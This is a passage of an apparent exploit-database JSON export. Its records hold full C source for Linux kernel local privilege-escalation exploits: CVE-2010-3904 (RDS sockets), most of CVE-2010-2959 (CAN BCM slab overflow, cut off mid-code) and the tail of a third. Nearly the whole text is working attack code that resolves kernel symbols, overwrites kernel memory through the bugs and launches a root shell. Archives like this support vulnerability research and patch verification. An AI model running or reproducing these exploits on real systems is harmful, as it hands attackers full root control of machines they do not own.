**argv)\n{\n\tint type;\n\n\tif (sizeof(unsigned long) != 8) {\n\t\tprintf(\"[-] x86_64 only, sorry!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] looking for symbols...\\n\");\n \n\tcommit_creds = (_commit_creds) get_symbol(\"commit_creds\");\n\tif (!commit_creds) {\n\t\tprintf(\"[-] symbol table not available, aborting!\\n\");\n\t\texit(1);\n\t}\n \n\tprepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\n\tif (!prepare_kernel_cred) {\n\t\tprintf(\"[-] symbol table not available, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tia32_sysret = get_symbol(\"ia32_sysret\");\n\tif (!ia32_sysret) {\n\t\tprintf(\"[-] symbol table not available, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] spawning children to achieve adjacent kstacks...\\n\");\n\n\ttype = get_adjacent_kstacks();\n\n\tif (type == KSTACK_PARENT) {\n\t\tdo_parent();\n\t} else if (type == KSTACK_UPPER) {\n\t\tdo_child_upper();\n\t} else if (type == KSTACK_LOWER) {\n\t\tdo_child_lower();\n\t}\n\n\treturn 0;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "cvss3": {}, "published": "2010-10-19T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-19T00:00:00", "id": "EXPLOITPACK:80919A880D8F23D053A90FDF86EB8DAA", "href": "", "sourceData": "// source: http://www.vsecurity.com/resources/advisory/20101019-1/\n\n/* \n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\n * CVE-2010-3904\n * by Dan Rosenberg <drosenberg@vsecurity.com>\n *\n * Copyright 2010 Virtual Security Research, LLC\n *\n * The handling functions for sending and receiving RDS messages\n * use unchecked __copy_*_user_inatomic functions without any\n * access checks on user-provided pointers. As a result, by\n * passing a kernel address as an iovec base address in recvmsg-style\n * calls, a local user can overwrite arbitrary kernel memory, which\n * can easily be used to escalate privileges to root. Alternatively,\n * an arbitrary kernel read can be performed via sendmsg calls.\n *\n * This exploit is simple - it resolves a few kernel symbols,\n * sets the security_ops to the default structure, then overwrites\n * a function pointer (ptrace_traceme) in that structure to point\n * to the payload. After triggering the payload, the original\n * value is restored. Hard-coding the offset of this function\n * pointer is a bit inelegant, but I wanted to keep it simple and\n * architecture-independent (i.e. no inline assembly).\n *\n * The vulnerability is yet another example of why you shouldn't\n * allow loading of random packet families unless you actually\n * need them.\n *\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\n * joberheide, bla, sts, and VSR\n *\n */\n\n\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <fcntl.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <errno.h>\n#include <string.h>\n#include <sys/ptrace.h>\n#include <sys/utsname.h>\n\n#define RECVPORT 5555 \n#define SENDPORT 6666\n\nint prep_sock(int port)\n{\n\t\n\tint s, ret;\n\tstruct sockaddr_in addr;\n\n\ts = socket(PF_RDS, SOCK_SEQPACKET, 0);\n\n\tif(s < 0) {\n\t\tprintf(\"[*] Could not open socket.\\n\");\n\t\texit(-1);\n\t}\n\t\n\tmemset(&addr, 0, sizeof(addr));\n\n\taddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(port);\n\n\tret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\n\n\tif(ret < 0) {\n\t\tprintf(\"[*] Could not bind socket.\\n\");\n\t\texit(-1);\n\t}\n\n\treturn s;\n\n}\n\nvoid get_message(unsigned long address, int sock)\n{\n\n\trecvfrom(sock, (void *)address, sizeof(void *), 0,\n\t\t NULL, NULL);\n\n}\n\nvoid send_message(unsigned long value, int sock)\n{\n\t\n\tint size, ret;\n\tstruct sockaddr_in recvaddr;\n\tstruct msghdr msg;\n\tstruct iovec iov;\n\tunsigned long buf;\n\t\n\tmemset(&recvaddr, 0, sizeof(recvaddr));\n\n\tsize = sizeof(recvaddr);\n\n\trecvaddr.sin_port = htons(RECVPORT);\n\trecvaddr.sin_family = AF_INET;\n\trecvaddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tmemset(&msg, 0, sizeof(msg));\n\t\n\tmsg.msg_name = &recvaddr;\n\tmsg.msg_namelen = sizeof(recvaddr);\n\tmsg.msg_iovlen = 1;\n\t\n\tbuf = value;\n\n\tiov.iov_len = sizeof(buf);\n\tiov.iov_base = &buf;\n\n\tmsg.msg_iov = &iov;\n\n\tret = sendmsg(sock, &msg, 0);\n\tif(ret < 0) {\n\t\tprintf(\"[*] Something went wrong sending.\\n\");\n\t\texit(-1);\n\t}\n}\n\nvoid write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\n{\n\n\tif(!fork()) {\n\t\t\tsleep(1);\n\t\t\tsend_message(value, sendsock);\n\t\t\texit(1);\n\t}\n\telse {\n\t\tget_message(addr, recvsock);\n\t\twait(NULL);\n\t}\n\n}\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\nint __attribute__((regparm(3)))\ngetroot(void * file, void * vma)\n{\n\n\tcommit_creds(prepare_kernel_cred(0));\n\treturn -1;\t\n\n}\n\n/* thanks spender... */\nunsigned long get_kernel_sym(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy;\n\tchar sname[512];\n\tstruct utsname ver;\n\tint ret;\n\tint rep = 0;\n\tint oldstyle = 0;\n\n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (f == NULL) {\n\t\tf = fopen(\"/proc/ksyms\", \"r\");\n\t\tif (f == NULL)\n\t\t\tgoto fallback;\n\t\toldstyle = 1;\n\t}\n\nrepeat:\n\tret = 0;\n\twhile(ret != EOF) {\n\t\tif (!oldstyle)\n\t\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\telse {\n\t\t\tret = fscanf(f, \"%p %s\\n\", (void **)&addr, sname);\n\t\t\tif (ret == 2) {\n\t\t\t\tchar *p;\n\t\t\t\tif (strstr(sname, \"_O/\") || strstr(sname, \"_S.\"))\n\t\t\t\t\tcontinue;\n\t\t\t\tp = strrchr(sname, '_');\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, \"smp\", 3)) {\n\t\t\t\t\tp = p - 4;\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\n\t\t\t\t\t\tp--;\n\t\t\t\t\t*p = '\\0';\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfprintf(stdout, \" [+] Resolved %s to %p%s\\n\", name, (void *)addr, rep ? \" (via System.map)\" : \"\");\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\n\tfclose(f);\n\tif (rep)\n\t\treturn 0;\nfallback:\n\t/* didn't find the symbol, let's retry with the System.map\n\t dedicated to the pointlessness of Russell Coker's SELinux\n\t test machine (why does he keep upgrading the kernel if\n\t \"all necessary security can be provided by SE Linux\"?)\n\t*/\n\tuname(&ver);\n\tif (strncmp(ver.release, \"2.6\", 3))\n\t\toldstyle = 1;\n\tsprintf(sname, \"/boot/System.map-%s\", ver.release);\n\tf = fopen(sname, \"r\");\n\tif (f == NULL)\n\t\treturn 0;\n\trep = 1;\n\tgoto repeat;\n}\n\nint main(int argc, char * argv[])\n{\n\tunsigned long sec_ops, def_ops, cap_ptrace, target;\n\tint sendsock, recvsock;\n\tstruct utsname ver;\n\n\tprintf(\"[*] Linux kernel >= 2.6.30 RDS socket exploit\\n\");\n\tprintf(\"[*] by Dan Rosenberg\\n\");\n\n\tuname(&ver);\n\n\tif(strncmp(ver.release, \"2.6.3\", 5)) {\n\t\tprintf(\"[*] Your kernel is not vulnerable.\\n\");\n\t\treturn -1;\n\t}\t\n\n\t/* Resolve addresses of relevant symbols */\n\tprintf(\"[*] Resolving kernel addresses...\\n\");\n\tsec_ops = get_kernel_sym(\"security_ops\");\n\tdef_ops = get_kernel_sym(\"default_security_ops\");\n\tcap_ptrace = get_kernel_sym(\"cap_ptrace_traceme\");\n\tcommit_creds = (_commit_creds) get_kernel_sym(\"commit_creds\");\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym(\"prepare_kernel_cred\");\n\n\tif(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\n\t\tprintf(\"[*] Failed to resolve kernel symbols.\\n\");\n\t\treturn -1;\n\t}\n\n\t/* Calculate target */\n\ttarget = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\n\n\tsendsock = prep_sock(SENDPORT);\n\trecvsock = prep_sock(RECVPORT);\n\n\t/* Reset security ops */\n\tprintf(\"[*] Overwriting security ops...\\n\");\n\twrite_to_mem(sec_ops, def_ops, sendsock, recvsock);\n\n\t/* Overwrite ptrace_traceme security op fptr */\n\tprintf(\"[*] Overwriting function pointer...\\n\");\n\twrite_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\n\n\t/* Trigger the payload */\n\tprintf(\"[*] Triggering payload...\\n\");\n\tptrace(PTRACE_TRACEME, 1, NULL, NULL);\n\t\n\t/* Restore the ptrace_traceme security op */\n\tprintf(\"[*] Restoring function pointer...\\n\");\n\twrite_to_mem(target, cap_ptrace, sendsock, recvsock);\n\n\tif(getuid()) {\n\t\tprintf(\"[*] Exploit failed to get root.\\n\");\n\t\treturn -1;\n\t}\n\n\tprintf(\"[*] Got root!\\n\");\n\texecl(\"/bin/sh\", \"sh\", NULL);\n\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 2.6.36-rc1 (Ubuntu 10.04 2.6.32) - CAN BCM Local Privilege Escalation", "cvss3": {}, "published": "2010-08-27T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.36-rc1 (Ubuntu 10.04 2.6.32) - CAN BCM Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2959"], "modified": "2010-08-27T00:00:00", "id": "EXPLOITPACK:7198CA63BDD8344EDEAC346D002AFAFD", "href": "", "sourceData": "/*\n * i-CAN-haz-MODHARDEN.c\n *\n * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959\n *\n * Ben Hawkes discovered an integer overflow in the Controller Area Network\n * (CAN) subsystem when setting up frame content and filtering certain \n * messages. An attacker could send specially crafted CAN traffic to crash \n * the system or gain root privileges. \n *\n * Usage:\n *\n * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden\n * $ ./i-can-haz-modharden\n * ...\n * [+] launching root shell!\n * # id\n * uid=0(root) gid=0(root)\n *\n * Notes:\n *\n * The allocation pattern of the CAN BCM module gives us some desirable \n * properties for smashing the SLUB. We control the kmalloc with a 16-byte\n * granularity allowing us to place our allocation in the SLUB cache of our\n * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for \n * old-times sake). The allocation can also be made in its own discrete \n * stage before the overwrite which allows us to be a bit more conservative \n * in ensuring the proper layout of our SLUB cache.\n *\n * To exploit the vulnerability, we first create a BCM RX op with a crafted \n * nframes to trigger the integer overflow during the kmalloc. On the second\n * call to update the existing RX op, we bypass the E2BIG check since the \n * stored nframes in the op is large, yet has an insufficiently sized \n * allocation associated with it. We then have a controlled write into the \n * adjacent shmid_kernel object in the 96-byte SLUB cache.\n *\n * However, while we control the length of the SLUB overwrite via a \n * memcpy_fromiovec operation, there exists a memset operation that directly \n * follows which zeros out last_frames, likely an adjacent allocation, with \n * the same malformed length, effectively nullifying our shmid smash. To \n * work around this, we take advantage of the fact that copy_from_user can\n * perform partial writes on x86 and trigger an EFAULT by setting up a \n * truncated memory mapping as the source for the memcpy_fromiovec operation,\n * allowing us to smash the necessary amount of memory and then pop out and \n * return early before the memset operation occurs.\n *\n * We then perform a dry-run and detect the shmid smash via an EIDRM errno \n * from shmat() caused by an invalid ipc_perm sequence number. Once we're \n * sure we have a shmid_kernel under our control we re-smash it with the \n * malformed version and redirect control flow to our credential modifying\n * calls mapped in user space.\n *\n * Distros: please use grsecurity's MODHARDEN or SELinux's module_request \n * to restrict unprivileged loading of uncommon packet families. Allowing\n * the loading of poorly-written PF modules just adds a non-trivial and \n * unnecessary attack surface to the kernel. \n *\n * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports \n * easily to other vulnerable kernels/distros. Careful, it could use some \n * post-exploitation stability love as well.\n *\n * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that \n * this exploit borrows code from.\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <limits.h>\n#include <inttypes.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/ipc.h>\n#include <sys/shm.h>\n#include <sys/mman.h>\n#include <sys/stat.h>\n\n#define SLUB \"kmalloc-96\"\n#define ALLOCATION 96\n#define FILLER 100\n\n#ifndef PF_CAN\n#define PF_CAN 29\n#endif\n\n#ifndef CAN_BCM\n#define CAN_BCM 2\n#endif\n\nstruct sockaddr_can {\n\tsa_family_t can_family;\n\tint can_ifindex;\n\tunion {\n\t\tstruct { uint32_t rx_id, tx_id; } tp;\n\t} can_addr;\n};\n\nstruct can_frame {\n\tuint32_t can_id;\n\tuint8_t can_dlc;\n\tuint8_t data[8] __attribute__((aligned(8)));\n};\n\nstruct bcm_msg_head {\n\tuint32_t opcode;\n\tuint32_t flags;\n\tuint32_t count;\n\tstruct timeval ival1, ival2;\n\tuint32_t can_id;\n\tuint32_t nframes;\n\tstruct can_frame frames[0];\n};\n\n#define RX_SETUP 5\n#define RX_DELETE 6\n#define CFSIZ sizeof(struct can_frame)\n#define MHSIZ sizeof(struct bcm_msg_head)\n#define IPCMNI 32768\n#define\tEIDRM 43\n#define HDRLEN_KMALLOC 8\n\nstruct list_head {\n\tstruct list_head *next;\n\tstruct list_head *prev;\n};\n\nstruct super_block {\n\tstruct list_head s_list;\n\tunsigned int s_dev;\n\tunsigned long s_blocksize;\n\tunsigned char s_blocksize_bits;\n\tunsigned char s_dirt;\n\tuint64_t s_maxbytes;\n\tvoid *s_type;\n\tvoid *s_op;\n\tvoid *dq_op;\n\tvoid *s_qcop;\n\tvoid *s_export_op;\n\tunsigned long s_flags;\n} super_block;\n\nstruct mutex {\n\tunsigned int count;\n\tunsigned int wait_lock;\n\tstruct list_head wait_list;\n\tvoid *owner;\n};\n\nstruct inode {\n\tstruct list_head i_hash;\n\tstruct list_head i_list;\n\tstruct list_head i_sb_list;\n\tstruct list_head i_dentry_list;\n\tunsigned long i_ino;\n\tunsigned int i_count;\n\tunsigned int i_nlink;\n\tunsigned int i_uid;\n\tunsigned int i_gid;\n\tunsigned int i_rdev;\n\tuint64_t i_version;\n\tuint64_t i_size;\n\tunsigned int i_size_seqcount;\n\tlong i_atime_tv_sec;\n\tlong i_atime_tv_nsec;\n\tlong i_mtime_tv_sec;\n\tlong i_mtime_tv_nsec;\n\tlong i_ctime_tv_sec;\n\tlong i_ctime_tv_nsec;\n\tuint64_t i_blocks;\n\tunsigned int i_blkbits;\n\tunsigned short i_bytes;\n\tunsigned short i_mode;\n\tunsigned int i_lock;\n\tstruct mutex i_mutex;\n\tunsigned int i_alloc_sem_activity;\n\tunsigned int i_alloc_sem_wait_lock;\n\tstruct list_head i_alloc_sem_wait_list;\n\tvoid *i_op;\n\tvoid *i_fop;\n\tstruct super_block *i_sb;\n\tvoid *i_flock;\n\tvoid *i_mapping;\n\tchar i_data[84];\n\tvoid *i_dquot_1;\n\tvoid *i_dquot_2;\n\tstruct list_head i_devices;\n\tvoid *i_pipe_union;\n\tunsigned int i_generation;\n\tunsigned int i_fsnotify_mask;\n\tvoid *i_fsnotify_mark_entries;\n\tstruct list_head inotify_watches;\n\tstruct mutex inotify_mutex;\n} inode;\n\nstruct dentry {\n\tunsigned int d_count;\n\tunsigned int d_flags;\n\tunsigned int d_lock;\n\tint d_mounted;\n\tvoid *d_inode;\n\tstruct list_head d_hash;\n\tvoid *d_parent;\n} dentry;\n\nstruct file_operations {\n\tvoid *owner;\n\tvoid *llseek;\n\tvoid *read;\n\tvoid *write;\n\tvoid *aio_read;\n\tvoid *aio_write;\n\tvoid *readdir;\n\tvoid *poll;\n\tvoid *ioctl;\n\tvoid *unlocked_ioctl;\n\tvoid *compat_ioctl;\n\tvoid *mmap;\n\tvoid *open;\n\tvoid *flush;\n\tvoid *release;\n\tvoid *fsync;\n\tvoid *aio_fsync;\n\tvoid *fasync;\n\tvoid *lock;\n\tvoid *sendpage;\n\tvoid *get_unmapped_area;\n\tvoid *check_flags;\n\tvoid *flock;\n\tvoid *splice_write;\n\tvoid *splice_read;\n\tvoid *setlease;\n} op;\n\nstruct vfsmount {\n\tstruct list_head mnt_hash;\n\tvoid *mnt_parent;\n\tvoid *mnt_mountpoint;\n\tvoid *mnt_root;\n\tvoid *mnt_sb;\n\tstruct list_head mnt_mounts;\n\tstruct list_head mnt_child;\n\tint mnt_flags;\n\tconst char *mnt_devname;\n\tstruct list_head mnt_list;\n\tstruct list_head mnt_expire;\n\tstruct list_head mnt_share;\n\tstruct list_head mnt_slave_list;\n\tstruct list_head mnt_slave;\n\tstruct vfsmount *mnt_master;\n\tstruct mnt_namespace *mnt_ns;\n\tint mnt_id;\n\tint mnt_group_id;\n\tint mnt_count;\n} vfsmount;\n\nstruct file {\n\tstruct list_head fu_list;\n\tstruct vfsmount *f_vfsmnt;\n\tstruct dentry *f_dentry;\n\tvoid *f_op;\n\tunsigned int f_lock;\n\tunsigned long f_count;\n} file;\n\nstruct kern_ipc_perm {\n\tunsigned int lock;\n\tint deleted;\n\tint id;\n\tunsigned int key;\n\tunsigned int uid;\n\tunsigned int gid;\n\tunsigned int cuid;\n\tunsigned int cgid;\n\tunsigned int mode;\n\tunsigned int seq;\n\tvoid *security;\n};\n\nstruct shmid_kernel {\n\tstruct kern_ipc_perm shm_perm;\n\tstruct file *shm_file;\n\tunsigned long shm_nattch;\n\tunsigned long shm_segsz;\n\ttime_t shm_atim;\n\ttime_t shm_dtim;\n\ttime_t shm_ctim;\n\tunsigned int shm_cprid;\n\tunsigned int shm_lprid;\n\tvoid *mlock_user;\n} shmid_kernel;\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\nint __attribute__((regparm(3)))\nkernel_code(struct file *file, void *vma)\n{\n\tcommit_creds(prepare_kernel_cred(0));\n\treturn -1;\n}\n\nunsigned long\nget_symbol(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy;\n\tchar sname[512];\n\tint ret = 0, oldstyle;\n\n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (f == NULL) {\n\t\tf = fopen(\"/proc/ksyms\", \"r\");\n\t\tif (f == NULL)\n\t\t\treturn 0;\n\t\toldstyle = 1;\n\t}\n\n\twhile (ret != EOF) {\n\t\tif (!oldstyle) {\n\t\t\tret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sname);\n\t\t} else {\n\t\t\tret = fscanf(f, \"%p %s\\n\", (void **) &addr, sname);\n\t\t\tif (ret == 2) {\n\t\t\t\tchar *p;\n\t\t\t\tif (strstr(sname, \"_O/\") || strstr(sname, \"_S.\")) {\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\tp = strrchr(sname, '_');\n\t\t\t\tif (p > ((char *) sname + 5) && !strncmp(p - 3, \"smp\", 3)) {\n\t\t\t\t\tp = p - 4;\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_') {\n\t\t\t\t\t\tp--;\n\t\t\t\t\t}\n\t\t\t\t\t*p = '\\0';\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tprintf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\tfclose(f);\n\n\treturn 0;\n}\n\nint\ncheck_slabinfo(char *cache, int *active_out, int *total_out)\n{\n\tFILE *fp;\n\tchar name[64], slab[256];\n\tint active, total, diff;\n\n\tmemset(slab, 0, sizeof(slab));\n\tmemset(name, 0, sizeof(name));\n\n\tfp = fopen(\"/proc/slabinfo\", \"r\");\n\tif (!fp) {\n\t\tprintf(\"[-] sorry, /proc/slabinfo is not available!\");\n\t\texit(1);\n\t}\n\n\tfgets(slab, sizeof(slab) - 1, fp);\n\twhile (1) {\n\t\tfgets(slab, sizeof(slab) - 1, fp);\n\t\tsscanf(slab, \"%s %u %u\", name, &active, &total);\n\t\tdiff = total - active;\n\t\tif (strcmp(name, cache) == 0) {\n\t\t\tbreak;\n\t\t}\n\t}\n\tfclose(fp);\n\n\tif (active_out) {\n\t\t*active_out = active;\n\t}\n\tif (total_out) {\n\t\t*total_out = total;\n\t}\n\treturn diff;\n}\n\nvoid\ntrigger(void)\n{\n\tint *shmids;\n\tint i, ret, sock, cnt, base, smashed;\n\tint diff, active, total, active_new, total_new;\n\tint len, sock_len, mmap_len;\n\tstruct sockaddr_can addr;\n\tstruct bcm_msg_head *msg;\n\tvoid *efault;\n\tchar *buf;\n\n\tprintf(\"[+] creating PF_CAN socket...\\n\");\n\n\tsock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);\n\tif (sock < 0) {\n\t\tprintf(\"[-] kernel lacks CAN packet family support\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] connecting PF_CAN socket...\\n\");\n\n\tmemset(&addr, 0, sizeof(addr));\n\taddr.can_family = PF_CAN;\n\n\tret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));\n\tif (sock < 0) {\n\t\tprintf(\"[-] could not connect CAN socket\\n\");\n\t\texit(1);\n\t}\n\n\tlen = MHSIZ + (CFSIZ * (ALLOCATION / 16));\n\tmsg = malloc(len);\n\tmemset(msg, 0, len);\n\tmsg->can_id = 2959;\n\tmsg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;\n\n\tprintf(\"[+] clearing out any active OPs via RX_DELETE...\\n\");\n\t\n\tmsg->opcode = RX_DELETE;\n\tret = send(sock, msg, len, 0);\n\n\tprintf(\"[+] removing any active user-owned shmids...\\n\");\n\n\tsystem(\"for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;\");\n\n\tprintf(\"[+] massaging \" SLUB \" SLUB cache with dummy allocations\\n\");\n\n\tdiff = check_slabinfo(SLUB, &active, &total);\n\n\tshmids = malloc(sizeof(int) * diff * 10);\n\n\tcnt = diff * 10;\n\tfor (i = 0; i < cnt; ++i) {\n\t\tdiff = check_slabinfo(SLUB, &active, &total);\n\t\tif (diff == 0) {\n\t\t\tbreak;\n\t\t}\n\t\tshmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\n\t}\n\tbase = i;\n\n\tif (diff != 0) {\n\t\tprintf(\"[-] inconsistency detected with SLUB cache allocation, please try again\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] corrupting BCM OP with truncated allocation via RX_SETUP...\\n\");\n\n\ti = base;\n\tcnt = i + FILLER;\n\tfor (; i < cnt; ++i) {\n\t\tshmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\n\t}\n\n\tmsg->opcode = RX_SETUP;\n\tret = send(sock, msg, len, 0);\n\tif (ret < 0) {\n\t\tprintf(\"[-] kernel rejected malformed CAN header\\n\");\n\t\texit(1);\n\t}\n\n\ti = base + FILLER;\n\tcnt = i + FILLER;\n\tfor (; i < cnt; ++i) {\n\t\tshmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\n\t}\n\n\tprintf(\"[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\\n\");\n\n\tmmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);\n\tsock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);\n\tefault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n\n\tprintf(\"[+] mmap'ed mapping of length %d at %p\\n\", mmap_len, efault);\n\n\tprintf(\"[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\\n\");\n\n\tmsg = (struct bcm_msg_head *) efault;\n\tmemset(msg, 0, mmap_len);\n\tmsg->can_id = 2959;\n\tmsg->nframes = (ALLOCATION / 16) * 4;\n\n\tmsg->opcode = RX_SETUP;\n\tret = send(sock, msg, mmap_len, 0);\n\tif (ret != -1 && errno != EFAULT) {\n\t\tprintf(\"[-] couldn't trigger EFAULT, exploit aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] seeking out the smashed shmid_kernel...\\n\");\n\n\ti = base;\n\tcnt = i + FILLER + FILLER;\n\tfor (; i < cnt; ++i) {\n\t\tret = (int) shmat(shmids[i], NULL, SHM_RDONLY);\n\t\tif (ret == -1 && errno == EIDRM) {\n\t\t\tsmashed = i;\n\t\t\tbreak;\n\t\t}\n\t}\n\tif (i == cnt) {\n\t\tprintf(\"[-] could not find smashed shmid, trying running the exploit again!\\n\");\n\t\texit(1);\n\t}\n\t\n\tprintf(\"[+] discovered our smashed shmid_kernel at shmid[%d] = %d\\n\", i, shmids[i]);\n\n\tprintf(\"[+] re-smashing the shmid_kernel with exploit payload...\\n\");\n\n\tshmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;\n\n\tbuf = (char *) msg;\n\tmemcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); \n\n\tmsg->opcode = RX_SETUP;\n\tret = send(sock, msg, mmap_len, 0);\n\tif (ret != -1 && errno != EFAULT) {\n\t\tprintf(\"[-] couldn't trigger EFAULT, exploit aborting!\\n\");\n\t\texit(1);\n\t}\n\t\n\tret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);\n\tif (ret == -1 && errno != EIDRM) {\n\t\tsetresuid(0, 0, 0);\n\t\tsetresgid(0, 0, 0);\n\n\t\tprintf(\"[+] launching root shell!\\n\");\n\n\t\texecl(\"/bin/bash\", \"/bin/bash\", NULL);\n\t\texit(0);\n\t}\n\n\tprintf(\"[-] exploit failed! retry?\\n\");\n}\n\nvoid\nsetup(void)\n{\n\tprintf(\"[+] looking for symbols...\\n\");\n\n\tcommit_creds = (_commit_creds) get_symbol(\"commit_creds\");\n\tif (!commit_creds) {\n\t\tprintf(\"[-] symbol table not availabe, aborting!\\n\");\n\t}\n\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\n\tif (!prepare_kernel_cred) {\n\t\tprintf(\"[-] symbol table not availabe, aborting!\\n\");\n\t}\n\n\tprintf(\"[+] setting up exploit payload...\\n\");\n\n\tsuper_block.s_flags = 0;\n\n\tinode.i_size = 4096;\n\tinode.i_sb = &super_block;\n\tinode.inotify_watches.next = &inode.inotify_watches;\n\tinode.inotify_watches.prev = &inode.inotify_watches;\n\tinode.inotify_mutex.count = 1;\n\n\tdentry.d_count = 4096;\n\tdentry.d_flags = 4096;\n\tdentry.d_parent = NULL;\n\tdentry.d_inode = &inode;\n\n\top.mmap = &kernel_code;\n\top.get_unmapped_area = &kernel_code;\n\n\tvfsmount.mnt_flags = 0;\n\tvfsmount.mnt_count = 1;\n\n\tfile.fu_list.prev = 